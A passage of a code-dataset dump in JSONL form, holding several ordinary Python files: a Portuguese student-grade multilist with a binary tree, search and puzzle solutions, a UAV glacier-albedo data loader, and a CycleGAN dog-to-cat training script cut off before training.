main()","repo_name":"ans2568/Dino_game","sub_path":"Dino game(leg swap version).py","file_name":"Dino game(leg swap version).py","file_ext":"py","file_size_in_byte":4518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39227884688","text":"from itertools import combinations\nfrom collections import Counter\n\n\ndef solution(orders, course):\n\n result = []\n\n for c in course:\n\n candidates = []\n cnt = {}\n\n for i in range(len(orders)):\n comb = combinations(orders[i], c)\n for com in comb:\n res = \"\".join(sorted(com))\n candidates.append(res)\n\n cand_cnt = Counter(candidates).most_common()\n\n for k, v in cand_cnt:\n if 2 <= v and v == cand_cnt[0][1]:\n result.append(k)\n\n return 
sorted(result)\n","repo_name":"unboxing96/ALGO","sub_path":"프로그래머스/lv2/72411. 메뉴 리뉴얼/메뉴 리뉴얼.py","file_name":"메뉴 리뉴얼.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14361551522","text":"class Node:\n def __init__(self,chave = None):\n self.chave = chave\n self.left = None\n self.right = None\n\n def gerar_arvore(self,lista,ini,fim):\n meio = (ini+fim) // 2\n self.chave = lista[meio]\n if ini <= meio-1:\n self.left = Node()\n self.left.gerar_arvore(lista,ini,meio-1)\n else:\n self.left = None\n if meio+1 <= fim:\n self.right = Node()\n self.right.gerar_arvore(lista,meio+1,fim)\n else:\n self.right = None\n\n def imprimir_pos(self):\n if self.left:\n self.left.imprimir_pos()\n if self.right:\n self.right.imprimir_pos()\n if self.chave:\n print(self.chave,end=' ')\n\n def imprimir_central(self):\n if self.left:\n self.left.imprimir_central()\n if self.chave:\n print(self.chave,end=' ')\n if self.right:\n self.right.imprimir_central()\n\n\nclass Disciplina:\n def __init__(self,nome,nota1,nota2):\n self.nome = nome\n self.nota1 = nota1\n self.nota2 = nota2\n \nclass Aluno:\n def __init__(self,aluno):\n self.aluno = aluno\n self.disciplinas = []\n self.next = None\n \nclass MultiLista:\n def __init__(self):\n self.head = None\n\n def append_aluno(self,n_aluno):\n if self.head:\n aux = self.head\n while aux.next:\n aux = aux.next\n aux.next = Aluno(n_aluno)\n print(\"Aluno cadastrado com sucesso!\")\n else:\n self.head = Aluno(n_aluno)\n print(\"Aluno cadastrado com sucesso!\")\n\n def buscar_aluno(self,n_aluno):\n if self.head:\n aux = self.head\n while aux and not (aux.aluno == n_aluno):\n aux = aux.next\n if aux:\n return aux\n else:\n print(\"Aluno não existente!\")\n\n def append_disciplina(self,n_aluno,n_disciplina,nota1,nota2):\n aux = self.buscar_aluno(n_aluno)\n if aux:\n aux.disciplinas.append(Disciplina(n_disciplina,nota1,nota2))\n print(\"Disciplina cadastrada com sucesso!\")\n else:\n print(\"Aluno não registrado. 
Retorne ao menu e faço o cadastro do aluno.\")\n\n def remove_aluno(self,n_aluno):\n if self.head:\n aux1 = self.head\n aux2 = None\n if aux1.aluno == n_aluno:\n self.head = aux1.next\n del aux1\n print(\"Aluno removido com sucesso!\")\n else:\n while aux1 and not (aux1.aluno == n_aluno):\n aux2 = aux1\n aux1 = aux1.next\n aux2.next = aux1.next\n del aux1\n print(\"Aluno removido com sucesso!\")\n \n def remove_disciplina(self,n_aluno,n_disciplina):\n aux = self.buscar_aluno(n_aluno)\n for i in range(len(aux.disciplinas)):\n if aux.disciplinas[i].nome == n_disciplina:\n aux.disciplinas.pop(i)\n print(\"Disciplina removida com sucesso!\")\n\n def remover_nota(self,n_aluno,n_disciplina):\n aux = self.buscar_aluno(n_aluno)\n for i in range(len(aux.disciplinas)):\n if aux.disciplinas[i].nome == n_disciplina:\n op = int(input(\"Qual nota que deseja excluir?\\n1 - Nota1\\n2 - Nota2\\n\"))\n if op == 1:\n aux1 = aux.disciplinas[i].nota1\n aux.disciplinas[i].nota1 = None\n del aux1\n print(\"Primeira nota removida com sucesso!\")\n else:\n aux2 = aux.disciplinas[i].nota2\n aux.disciplinas[i].nota2 = None\n del aux2\n print(\"Segunda nota removida com sucesso!\")\n\n def atualizar_aluno(self,n_aluno,n_aluno_atualizado):\n if self.head:\n aux = self.head\n while aux and not(aux.aluno == n_aluno):\n aux = aux.next\n aux.aluno = n_aluno_atualizado\n\n def atualizar_disciplina(self,n_aluno,n_disciplina,n_disciplina_atualizado):\n if self.head:\n aux = self.buscar_aluno(n_aluno)\n for i in range(len(aux.disciplinas)):\n if aux.disciplinas[i].nome == n_disciplina:\n aux.disciplinas[i].nome = n_disciplina_atualizado\n else:\n print(\"Disciplina não encontrada.\")\n\n def atualizar_nota(self,n_aluno,n_disciplina):\n if self.head:\n aux = self.buscar_aluno(n_aluno)\n for i in range(len(aux.disciplinas)):\n if aux.disciplinas[i].nome == n_disciplina:\n op = int(input(\"Qual nota que deseja atualizar?\\n1 - Nota1\\n2 - Nota2:\\n\"))\n if op == 1:\n nota1 = int(input(\"Digite a nota atualizada: \"))\n aux.disciplinas[i].nota1 = nota1\n else:\n nota2 = int(input(\"Digite a nota atualizada: \"))\n aux.disciplinas[i].nota2 = nota2\n print(\"Notas atualizadas com sucesso!\")\n\n def visualizar_alunos_aprovados(self,n_aluno):\n if self.head:\n aux = self.buscar_aluno(n_aluno)\n print(\"--------------------\")\n print('{',aux.aluno,'}',\"- Disciplinas com média maior que 7:\")\n for i in range(len(aux.disciplinas)):\n if aux.disciplinas[i].nota1 and aux.disciplinas[i].nota2:\n if (aux.disciplinas[i].nota1 + aux.disciplinas[i].nota2) / 2 >= 7:\n print(aux.disciplinas[i].nome)\n else:\n print(\"Aluno não possui disciplinas com media de aprovação\")\n\n def visualizar_alunos_reprovados(self,n_aluno):\n if self.head:\n aux = self.buscar_aluno(n_aluno)\n print(\"--------------------\")\n print('{',aux.aluno,'}',\"- Disciplinas com média menor que 7:\")\n for i in range(len(aux.disciplinas)):\n if aux.disciplinas[i].nota1 and aux.disciplinas[i].nota2:\n if (aux.disciplinas[i].nota1 + aux.disciplinas[i].nota2) / 2 < 7:\n print(aux.disciplinas[i].nome)\n else:\n print(\"Aluno não possui disciplinas com media de reprovação\")\n\n def visualizar_media(self,n_aluno,n_disciplina):\n if self.head:\n aux = self.buscar_aluno(n_aluno)\n for i in range(len(aux.disciplinas)):\n if aux.disciplinas[i].nome == n_disciplina:\n if aux.disciplinas[i].nota1 and aux.disciplinas[i].nota2:\n print(\"--------------------\")\n print('{',aux.aluno,'}')\n print(aux.disciplinas[i].nome,\"-\",(aux.disciplinas[i].nota1 + aux.disciplinas[i].nota2) / 
2)\n else:\n print(\"Aluno informado possui apenas 1 ou nenhuma nota na disciplina!\")\n\n def gerar_lista(self):\n l = []\n if self.head:\n aux = self.head\n while aux:\n l.append(aux.aluno)\n aux = aux.next\n return l\n\n def imprimir_crescente(self):\n vetor = self.gerar_lista()\n if vetor:\n vetor.sort()\n return vetor\n else:\n return 0\n\n def relatorio_notas(self,n_aluno):\n if self.head:\n aux = self.head\n while aux and not aux.aluno == n_aluno:\n aux = aux.next\n print(\"--------------------\")\n print('{',aux.aluno,'}')\n for i in aux.disciplinas:\n print(i.nome,'-',i.nota1,'-',i.nota2)\n else:\n print(\"Não existem alunos cadastrados!\")\n\nuni = MultiLista()\ntree = Node()\n\nuser = -1\nwhile user != 0:\n print(\"\\n----------MENU----------\")\n print(\"1 - Cadastrar aluno\\n2 - Cadastrar disciplina em aluno\\n3 - Remover aluno\\n4 - Remover disciplina de aluno\\n5 - Remover nota de disciplina de aluno\\n6 - Atualizar aluno\\n7 - Atualizar disciplina de aluno\\n8 - Atualizar nota de disciplina de aluno\\n9 - Visualizar a média do aluno em uma disciplina\\n10 - Visualizar os nomes dos alunos em ordem alfabética\\n11 - Visualizar os nomes dos alunos que estão com média menor que 7\\n12 - Visualizar os nomes dos alunos que estão com média maior ou igual a 7\\n13 - Visualizar as notas das disciplinas cadastradas em um aluno\\n0 - Sair.\\n\")\n user = int(input(\"Digite a sua opção: \\n\"))\n if user == 1:\n print(\"------Cadastrar Aluno------\\n\")\n n_aluno = input(\"Digite o nome do aluno: \")\n uni.append_aluno(n_aluno)\n\n elif user == 2:\n print(\"---Cadastrar disciplina e notas da disciplina---\\n\")\n n_aluno = input(\"Digite o nome do aluno: \")\n n_disciplina = input(\"Informe a disciplina que deseja cadastrar: \\n\")\n nota1 = float(input(\"Informe a primeira nota do aluno: \"))\n nota2 = float(input(\"Informe a segunda nota do aluno: \\n\"))\n uni.append_disciplina(n_aluno,n_disciplina,nota1,nota2)\n\n elif user == 3:\n print(\"------Remover Aluno------\\n\")\n n_aluno = input(\"Informe o aluno que deseja remover: \\n\")\n uni.remove_aluno(n_aluno)\n\n elif user == 4:\n print(\"------Remover Disciplina-------\\n\")\n n_aluno = input(\"Digite o nome do aluno que deseja remover a disciplina: \")\n n_disciplina = input(\"Digite a disciplina do aluno que irá ser removido: \")\n uni.remove_disciplina(n_aluno,n_disciplina)\n\n elif user == 5:\n print(\"----Remover nota de disciplina de aluno----\\n\")\n n_aluno = input(\"Digite o nome do aluno que deseja remover a nota: \") \n n_disciplina = input(\"Informe a disciplina que deseja remover a nota: \\n\")\n uni.remover_nota(n_aluno,n_disciplina)\n\n elif user == 6:\n print(\"------Atualizar Aluno-------\\n\")\n n_aluno = input(\"Informe o aluno que deseja atulizar: \")\n n_aluno_atualizado = input(\"Informe o nome do aluno atualizado: \\n\")\n uni.atualizar_aluno(n_aluno,n_aluno_atualizado)\n\n elif user == 7:\n print(\"-------Atualizar Disciplina---------\\n\")\n n_aluno = input(\"Informe o nome do aluno que deseja atualizar: \")\n n_disciplina = input(\"Informe a disciplina do que o aluno está matriculado: \")\n n_disciplina_atualizado = input(\"Digite o nome atualizado da disciplina: \")\n uni.atualizar_disciplina(n_aluno, n_disciplina,n_disciplina_atualizado)\n\n elif user == 8:\n print(\"-------Atualizar nota do Aluno-------\\n\")\n n_aluno = input(\"Informe o aluno que deseja atualizar as notas: \")\n n_disciplina = input(\"Informe a disciplina do aluno: \")\n uni.atualizar_nota(n_aluno,n_disciplina)\n\n elif user == 9:\n 
print(\"-----View a student's average in a course------\\n\")\n        n_aluno = input(\"Enter the student's name: \")\n        n_disciplina = input(\"Enter the student's course: \")\n        uni.visualizar_media(n_aluno,n_disciplina)\n\n    elif user == 10:\n        print(\"-----View the students' names in alphabetical order in the tree-----\\n\")\n        lista_alunos = uni.imprimir_crescente()\n        if lista_alunos == 0:\n            print(\"There are no students registered in the tree!\")\n        else:\n            tree.gerar_arvore(lista_alunos,0,len(lista_alunos)-1)\n            tree.imprimir_central()\n            print()\n\n    elif user == 11:\n        print(\"---View the names of students whose average is below 7---\\n\")\n        n_aluno = input(\"Enter the student whose course averages should be checked: \")\n        uni.visualizar_alunos_reprovados(n_aluno)\n\n    elif user == 12:\n        print(\"---View the names of students whose average is 7 or higher---\\n\")\n        n_aluno = input(\"Enter the student whose course averages should be checked: \")\n        uni.visualizar_alunos_aprovados(n_aluno)\n\n    elif user == 13:\n        print(\"------View the grades of the student's courses-------\\n\")\n        n_aluno = input(\"Enter the student whose course grades should be checked: \")\n        uni.relatorio_notas(n_aluno)\n\n    elif user > 13:\n        print(\"This option is not available. Go back to the MENU.\\n\")","repo_name":"Gabrielgln/CodigosFaculdade","sub_path":"Python_2022.1/Unidade2/EstruturaDeDados-Projeto2/MultiLista-e-ArvoreBinaria.py","file_name":"MultiLista-e-ArvoreBinaria.py","file_ext":"py","file_size_in_byte":10961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42027055582","text":"import random\n\ndef linear_search(items, objective):\n    match = False\n\n    for i in items: # O(n)\n        if i == objective:\n            match = True\n            break\n\n    return match\n\n\nif __name__ == '__main__':\n    list_size = int(input('size list: '))\n    objective = int(input('number to search: '))\n\n    my_list = [random.randint(0, 100) for i in range(list_size)]\n    found = linear_search(my_list, objective)\n\n    print(my_list)\n    print(f'item {objective} {\"is in the list\" if found else \"not found\"}')","repo_name":"DavidBarcenas/python-course","sub_path":"oop/algorithms/linear_search.py","file_name":"linear_search.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71478653692","text":"from pprint import pprint\n\n\ndef result1(fileName):\n    data = []\n    for x in open(fileName):\n        data.append(x[:-1])\n    result = data[0]\n    mapping = data[2:]\n    map_dict = {}\n    for x in mapping:\n        items = x.split(\" -> \")\n        map_dict[items[0]] = items[1]\n    NR_DAYS = 10\n    for i in range(NR_DAYS):\n        result_after_day = \"\"\n        for j in range(len(result)-1):\n            result_after_day = result_after_day + result[j] + map_dict[result[j:j+2]]\n        result = result_after_day + result[-1]\n        print(i, len(result))\n    letters = set(result)\n    occur = [result.count(x) for x in letters]\n    print(max(occur)-min(occur))\n\ndef result2(fileName):\n    data = []\n    for x in open(fileName):\n        data.append(x[:-1])\n    result = data[0]\n    mapping = data[2:]\n    map_dict = {}\n    for x in mapping:\n        items = x.split(\" -> \")\n        map_dict[items[0]] = items[1]\n    NR_DAYS = 40\n    count_mapping = {}\n\n    # processing initial result\n    for i in range(len(result)-1):\n        if result[i:i+2] in count_mapping:\n            count_mapping[result[i:i+2]] += 1\n        else:\n            count_mapping[result[i:i+2]] = 1\n\n    first_char = result[0]\n    last_char = result[-1]\n    print(count_mapping)\n    
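# each pair AB with an insertion rule AB -> C is replaced by AC and CB, so it\n    # is enough to track pair counts: the explicit polymer string roughly doubles\n    # every step and is far too long to build after 40 steps\n    # (e.g. the sample template NNCB starts out as {'NN': 1, 'NC': 1, 'CB': 1})\n    for i in 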
range(NR_DAYS):\n        old_count_mapping = count_mapping\n        count_mapping = {}\n        for key in old_count_mapping.keys():\n            new_pair1 = key[0]+map_dict[key]\n            new_pair2 = map_dict[key]+key[1]\n            if new_pair1 in count_mapping:\n                count_mapping[new_pair1] += old_count_mapping[key]\n            else:\n                count_mapping[new_pair1] = old_count_mapping[key]\n            if new_pair2 in count_mapping:\n                count_mapping[new_pair2] += old_count_mapping[key]\n            else:\n                count_mapping[new_pair2] = old_count_mapping[key]\n    print(count_mapping)\n    letters = [x for y in count_mapping.keys() for x in y]\n    print(letters)\n    unique_letters = set(letters)\n    final_count = {}\n    for x in unique_letters:\n        final_count[x] = 0\n    for key in count_mapping.keys():\n        for letter in key:\n            final_count[letter] += count_mapping[key]\n    # every letter is counted twice across the pairs except the two ends,\n    # so add the end characters back once and halve the totals\n    final_count[first_char] += 1\n    final_count[last_char] += 1\n    for key in final_count:\n        final_count[key] //= 2\n    occur = [final_count[x] for x in final_count.keys()]\n    print(max(occur)-min(occur))\n\n\n\ndef test():\n    return result1(\"sample.txt\")\n\n\ndef result2_golf():\n    print(\"No way\")\n\n\nif __name__ == \"__main__\":\n    # print(test())\n    # print(result1(\"input.txt\"))\n    print(result2(\"input.txt\"))\n","repo_name":"FrankvanMourik/AOC2021","sub_path":"day14/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3631873331","text":"# 1008. Construct Binary Search Tree from Preorder Traversal\n# https://leetcode.com/problems/construct-binary-search-tree-from-preorder-traversal/\n# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\nclass Solution:\n    def bstFromPreorder(self, preorder: List[int]) -> TreeNode:\n\n        def helper(root, s):\n            if root is None:\n                return TreeNode(s)\n            if root.val > s:\n                root.left = helper(root.left, s)\n            else:\n                root.right = helper(root.right, s)\n            return root\n\n        root = None\n        for i in range(len(preorder)):\n            root = helper(root, preorder[i])\n        return root\n","repo_name":"harshmalviya7/LeetCode_Coding_Questions","sub_path":"Tree/constructBinarySearchTreeFromPreOrderTraversal.py","file_name":"constructBinarySearchTreeFromPreOrderTraversal.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"449805080","text":"\"\"\"\nLoad all UAV-acquired data into xarray instances.\n\n\"\"\"\n\nimport datetime as dt\nimport xarray as xr\nimport georaster\nimport pandas as pd\nimport pyproj\nimport numpy as np\nimport salem\n\ndef add_srs(xrds, srs, x='x'):\n\tfor v in xrds.variables:\n\t\tif x in xrds[v].dims:\n\t\t\txrds[v].attrs['pyproj_srs'] = srs\n\treturn xrds\n\nuav_times = [dt.datetime(2017,7,15),\n\tdt.datetime(2017,7,20),\n\tdt.datetime(2017,7,21),\n\tdt.datetime(2017,7,22),\n\tdt.datetime(2017,7,23),\n\tdt.datetime(2017,7,24)\n\t]\n\n# UAV classified images \npth = '/scratch/UAV/L3/uav_2017*class*clf20190130_171930.nc'\n#'/scratch/UAV/uav2017_commongrid_bandcorrect/*classified*epsg32622.nc'\nuav_class = xr.open_mfdataset(pth,\n\tconcat_dim='time', chunks={'y':2000, 'x':2000})\n# Set up the time coordinate.\nuav_class['time'] = uav_times \nuav_class = add_srs(uav_class, 'epsg:32622')\n\n# Albedos\nuav_alb = xr.open_mfdataset('/scratch/UAV/uav2017_commongrid_bandcorrect/*albedo*epsg32622.nc',\n\tconcat_dim='time', chunks={'y':2000, 'x':2000})\n# Set up the time 
coordinate.\nuav_alb['time'] = uav_times \nuav_alb = add_srs(uav_alb, 'epsg:32622')\n\n\n# UAV DEMs\ndem_times = [dt.datetime(2017,7,15),\n\tdt.datetime(2017,7,20),\n\tdt.datetime(2017,7,21),\n\tdt.datetime(2017,7,22),\n\tdt.datetime(2017,7,23)\n\t]\ndems = xr.open_mfdataset('/scratch/UAV/uav2017_dem/*commongrid_epsg32622.nc',\n\tconcat_dim='time')#, chunks={'y':2000, 'x':2000})\n# Set up the time coordinate.\ndems['time'] = dem_times \ndems = add_srs(dems, 'epsg:32622')\n\ndem_upe = xr.open_dataset('/scratch/UAV/photoscan_outputs_2018/uav_20180724_PM_dem_common.nc')\ndem_upe = add_srs(dem_upe, 'epsg:32622')\n\n\n## Load mask to delimit 'good' area of 2017-07-24 flight.\nmsk = georaster.SingleBandRaster('/scratch/UAV/good_area_2017-07-24_3_common.tif')\n# I think it is possible to load geotiffs via xarray/rasterio now?\n\n## Extract UAV albedos at each temporal ground sampling location\n# First convert site coordinates to UTM (only for the temporal sites, numbered 1:5)\nall_gcps = pd.read_csv('/home/at15963/Dropbox/work/data/field_processed_2017/pixel_gcps_kely_formatted.csv', index_col=0)\ntemporal_gcps = {}\nutm = pyproj.Proj('+init=epsg:32623')\nfor\tn in np.arange(1,6):\n\tgcp = all_gcps.loc['GCP%s' %n]\n\tutmx, utmy = utm(gcp.lon, gcp.lat)\n\t# Approximately identify the reflectance measurement center - move towards camp\n\tutmx += 0.4\n\tutmy -= 0.4\n\ttemporal_gcps[n] = {'x':utmx, 'y':utmy}\ntemporal_gcps = pd.DataFrame(temporal_gcps).T\n\n\n## Convert destructive site coordinates to UTM\n\n\n\nshpf = salem.read_shapefile('/scratch/UAV/uav2017_dem/dem2017_commonarea_999.shp')\nuav_poly = salem.read_shapefile('/scratch/UAV/uav_2017_area.shp')\nuav_poly_upe = salem.read_shapefile('/scratch/UAV/uav_2018_area.shp')","repo_name":"atedstone/GrIS_ice_albedo_variability","sub_path":"load_uav_data.py","file_name":"load_uav_data.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1116701684","text":"# Setup the pipeline\nimport numpy as np\nimport tensorflow as tf\nfrom glob import glob\nfrom tensorflow import keras\nfrom tensorflow_examples.models.pix2pix import pix2pix\n\nimport os\nimport time\nimport matplotlib.pyplot as plt\n\nAUTOTUNE = tf.data.AUTOTUNE\n\nprint(tf.__version__)\n\n# Input pipeline\nDATA_FOLDER = '/home/est_posgrado_manuel.suarez/data/dogs-vs-cats/train'\ndog_files = np.array(glob(os.path.join(DATA_FOLDER, 'dog.*.jpg')))\ncat_files = np.array(glob(os.path.join(DATA_FOLDER, 'cat.*.jpg')))\n\nBUFFER_SIZE = len(dog_files)\nBATCH_SIZE = 20\nIMG_WIDTH = 256\nIMG_HEIGHT = 256\n\nn_images = dog_files.shape[0]\nsteps_per_epoch = n_images//BATCH_SIZE\nprint('num image files : ', n_images)\nprint('steps per epoch : ', steps_per_epoch )\n\ndef read_and_decode(file):\n img = tf.io.read_file(file)\n img = tf.image.decode_jpeg(img)\n img = tf.cast(img, tf.float32)\n # img = img / 255.0\n # img = tf.image.resize(img, INPUT_DIM[:2], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n return img\n\ndef load_image(file1):\n return read_and_decode(file1)\n\ndef random_crop(image):\n cropped_image = tf.image.random_crop(\n image, size=[IMG_HEIGHT, IMG_WIDTH, 3])\n\n return cropped_image\n\n# normalizing the images to [-1, 1]\ndef normalize(image):\n image = tf.cast(image, tf.float32)\n image = (image / 127.5) - 1\n return image\n\ndef random_jitter(image):\n # resizing to 286 x 286 x 3\n image = tf.image.resize(image, [286, 286],\n method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n\n # 
randomly cropping to 256 x 256 x 3\n image = random_crop(image)\n\n # random mirroring\n image = tf.image.random_flip_left_right(image)\n\n return image\n\ndef preprocess_image_train(image):\n image = random_jitter(image)\n image = normalize(image)\n return image\n\ndef preprocess_image_test(image):\n image = normalize(image)\n return image\n\n# Dataset's configuration\n# train_dataset = tf.data.Dataset.zip((dog_dataset, cat_dataset))\n# train_dataset = train_dataset.shuffle(buffer_size=n_images, reshuffle_each_iteration=True)\n# train_dataset = train_dataset.map(load_image, num_parallel_calls=tf.data.AUTOTUNE)\n# train_dataset = train_dataset.batch(BATCH_SIZE).repeat()\n\ntrain_dogs = tf.data.Dataset.list_files(dog_files, shuffle=False)\ntrain_dogs = train_dogs.map(load_image, num_parallel_calls=tf.data.AUTOTUNE)\ntrain_dogs = train_dogs.cache().map(\n preprocess_image_train, num_parallel_calls=AUTOTUNE).shuffle(\n BUFFER_SIZE).batch(BATCH_SIZE)\n\ntrain_cats = tf.data.Dataset.list_files(cat_files, shuffle=False)\ntrain_cats = train_cats.map(load_image, num_parallel_calls=tf.data.AUTOTUNE)\ntrain_cats = train_cats.cache().map(\n preprocess_image_train, num_parallel_calls=AUTOTUNE).shuffle(\n BUFFER_SIZE).batch(BATCH_SIZE)\n\nsample_dog = next(iter(train_dogs))\nsample_cat = next(iter(train_cats))\n\nplt.subplot(121)\nplt.title('Dog')\nplt.imshow(sample_dog[0] * 0.5 + 0.5)\n\nplt.subplot(122)\nplt.title('Dog with random jitter')\nplt.imshow(random_jitter(sample_dog[0]) * 0.5 + 0.5)\n\nprint(\"Plotting dog\")\nplt.savefig('figure_1.png')\n\nplt.subplot(121)\nplt.title('Cat')\nplt.imshow(sample_cat[0] * 0.5 + 0.5)\n\nplt.subplot(122)\nplt.title('Cat with random jitter')\nplt.imshow(random_jitter(sample_cat[0]) * 0.5 + 0.5)\n\nprint(\"Plotting cat\")\nplt.savefig('figure_2.png')\n\n# Configure Pix2Pix model\nOUTPUT_CHANNELS = 3\n\n# Loss function\n# Loss Functions\ndef discriminator_loss(loss_obj, real, generated):\n real_loss = loss_obj(tf.ones_like(real), real)\n generated_loss = loss_obj(tf.zeros_like(generated), generated)\n total_disc_loss = real_loss + generated_loss\n return total_disc_loss * 0.5\n\ndef generator_loss(loss_obj, generated):\n return loss_obj(tf.ones_like(generated), generated)\n\ndef calc_cycle_loss(real_image, cycled_image):\n loss1 = tf.reduce_mean(tf.abs(real_image - cycled_image))\n return LAMBDA * loss1\n\ndef identity_loss(real_image, same_image):\n loss = tf.reduce_mean(tf.abs(real_image - same_image))\n return LAMBDA * 0.5 * loss\n\nLAMBDA = 10\n\nclass CycleGAN(keras.Model):\n def __init__(self, p_lambda=LAMBDA, summary=False, **kwargs):\n super(CycleGAN, self).__init__(**kwargs)\n self.p_lambda = p_lambda\n\n # Architecture\n self.generator_g = pix2pix.unet_generator(OUTPUT_CHANNELS, norm_type='instancenorm')\n self.generator_f = pix2pix.unet_generator(OUTPUT_CHANNELS, norm_type='instancenorm')\n\n self.discriminator_x = pix2pix.discriminator(norm_type='instancenorm', target=False)\n self.discriminator_y = pix2pix.discriminator(norm_type='instancenorm', target=False)\n\n # Optimizers\n self.generator_g_optimizer = tf.keras.optimizers.Adam(2e-4, beta_1=0.5)\n self.generator_f_optimizer = tf.keras.optimizers.Adam(2e-4, beta_1=0.5)\n\n self.discriminator_x_optimizer = tf.keras.optimizers.Adam(2e-4, beta_1=0.5)\n self.discriminator_y_optimizer = tf.keras.optimizers.Adam(2e-4, beta_1=0.5)\n\n # Loss\n self.loss_obj = tf.keras.losses.BinaryCrossentropy(from_logits=True)\n\n # Metric trackers\n self.total_cycle_loss_tracker = 
tf.keras.metrics.Mean(name=\"total_cycle_loss\")\n self.total_gen_g_loss_tracker = tf.keras.metrics.Mean(name=\"total_gen_g_loss\")\n self.total_gen_f_loss_tracker = tf.keras.metrics.Mean(name=\"total_gen_f_loss\")\n self.disc_x_loss_tracker = tf.keras.metrics.Mean(name=\"disc_x_loss\")\n self.disc_y_loss_tracker = tf.keras.metrics.Mean(name=\"disc_y_loss\")\n\n @tf.function\n def train_step(self, data):\n # persistent is set to True because the tape is used more than\n # once to calculate the gradients.\n real_x, real_y = data\n with tf.GradientTape(persistent=True) as tape:\n # Generator G translates X -> Y\n # Generator F translates Y -> X.\n\n fake_y = self.generator_g(real_x, training=True)\n cycled_x = self.generator_f(fake_y, training=True)\n\n fake_x = self.generator_f(real_y, training=True)\n cycled_y = self.generator_g(fake_x, training=True)\n\n # same_x and same_y are used for identity loss.\n same_x = self.generator_f(real_x, training=True)\n same_y = self.generator_g(real_y, training=True)\n\n disc_real_x = self.discriminator_x(real_x, training=True)\n disc_real_y = self.discriminator_y(real_y, training=True)\n\n disc_fake_x = self.discriminator_x(fake_x, training=True)\n disc_fake_y = self.discriminator_y(fake_y, training=True)\n\n # calculate the loss\n gen_g_loss = generator_loss(self.loss_obj, disc_fake_y)\n gen_f_loss = generator_loss(self.loss_obj, disc_fake_x)\n\n total_cycle_loss = calc_cycle_loss(real_x, cycled_x) + calc_cycle_loss(real_y, cycled_y)\n\n # Total generator loss = adversarial loss + cycle loss\n total_gen_g_loss = gen_g_loss + total_cycle_loss + identity_loss(real_y, same_y)\n total_gen_f_loss = gen_f_loss + total_cycle_loss + identity_loss(real_x, same_x)\n\n disc_x_loss = discriminator_loss(self.loss_obj, disc_real_x, disc_fake_x)\n disc_y_loss = discriminator_loss(self.loss_obj, disc_real_y, disc_fake_y)\n\n # Calculate the gradients for generator and discriminator\n generator_g_gradients = tape.gradient(total_gen_g_loss,\n self.generator_g.trainable_variables)\n generator_f_gradients = tape.gradient(total_gen_f_loss,\n self.generator_f.trainable_variables)\n\n discriminator_x_gradients = tape.gradient(disc_x_loss,\n self.discriminator_x.trainable_variables)\n discriminator_y_gradients = tape.gradient(disc_y_loss,\n self.discriminator_y.trainable_variables)\n\n # Apply the gradients to the optimizer\n self.generator_g_optimizer.apply_gradients(zip(generator_g_gradients,\n self.generator_g.trainable_variables))\n\n self.generator_f_optimizer.apply_gradients(zip(generator_f_gradients,\n self.generator_f.trainable_variables))\n\n self.discriminator_x_optimizer.apply_gradients(zip(discriminator_x_gradients,\n self.discriminator_x.trainable_variables))\n\n self.discriminator_y_optimizer.apply_gradients(zip(discriminator_y_gradients,\n self.discriminator_y.trainable_variables))\n\n # compute progress\n self.total_cycle_loss_tracker.update_state(total_cycle_loss)\n self.total_gen_g_loss_tracker.update_state(total_gen_g_loss)\n self.total_gen_f_loss_tracker.update_state(total_gen_f_loss)\n self.disc_x_loss_tracker.update_state(disc_x_loss)\n self.disc_y_loss_tracker.update_state(disc_y_loss)\n return {\n \"total_cycle_loss\": self.total_cycle_loss_tracker.result(),\n \"total_gen_g_loss\": self.total_gen_g_loss_tracker.result(),\n \"total_gen_f_loss\": self.total_gen_f_loss_tracker.result(),\n \"disc_x_loss\": self.disc_x_loss_tracker.result(),\n \"disc_y_loss\": self.disc_y_loss_tracker.result()\n }\n\ncyclegan = CycleGAN(p_lambda=LAMBDA, 
summary=True)\nto_cat = cyclegan.generator_g(sample_dog)\nto_dog = cyclegan.generator_f(sample_cat)\nplt.figure(figsize=(8, 8))\ncontrast = 8\n\nimgs = [sample_dog, to_cat, sample_cat, to_dog]\ntitle = ['Dog', 'To Cat', 'Cat', 'To Dog']\n\nfor i in range(len(imgs)):\n    plt.subplot(2, 2, i+1)\n    plt.title(title[i])\n    if i % 2 == 0:\n        plt.imshow(imgs[i][0] * 0.5 + 0.5)\n    else:\n        plt.imshow(imgs[i][0] * 0.5 * contrast + 0.5)\nplt.savefig('figure_3.png')\n\nplt.figure(figsize=(8, 8))\n\nplt.subplot(121)\nplt.title('Is a real cat?')\nplt.imshow(cyclegan.discriminator_y(sample_cat)[0, ..., -1], cmap='RdBu_r')\n\nplt.subplot(122)\nplt.title('Is a real dog?')\nplt.imshow(cyclegan.discriminator_x(sample_dog)[0, ..., -1], cmap='RdBu_r')\n\nplt.savefig('figure_4.png')\nprint(\"Model built\")\n\n# Checkpoints\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom tensorflow.keras.callbacks import TerminateOnNaN\nfilepath = 'best_weight_model.h5'\n# monitor one of the metrics actually reported by train_step; a plain 'loss'\n# key is never logged by this custom training loop\ncheckpoint = ModelCheckpoint(filepath=filepath,\n                             monitor='total_gen_g_loss',\n                             verbose=1,\n                             save_best_only=True,\n                             save_weights_only=True,\n                             mode='min')\nterminate = TerminateOnNaN()\ncallbacks = [checkpoint, terminate]\n\n# Training\nEPOCHS = 20\n\n# 